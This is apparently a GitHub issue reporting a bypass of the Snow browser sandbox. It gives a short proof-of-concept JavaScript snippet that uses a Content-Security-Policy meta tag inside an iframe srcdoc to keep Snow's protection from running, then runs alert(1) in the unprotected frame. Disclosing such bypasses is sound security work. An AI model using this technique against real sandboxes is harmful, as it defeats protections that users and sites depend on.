Bypass using CSP

```
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `
<iframe
	srcdoc="
	<meta http-equiv='Content-Security-Policy' content=&quot;script-src 'nonce-pwnd' ;&quot;>
		<iframe src=&quot;javascript:haha&quot;>
		</iframe>
	<script nonce=&quot;pwnd&quot;>frames[0].alert(1);</script>">
</iframe>`
```
Similar to https://github.com/LavaMoat/snow/issues/90 and https://github.com/LavaMoat/snow/issues/92, using CSP to prevent `SNOW_WINDOW` from running :)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Bypass using CSP #94

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Bypass using CSP #94

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions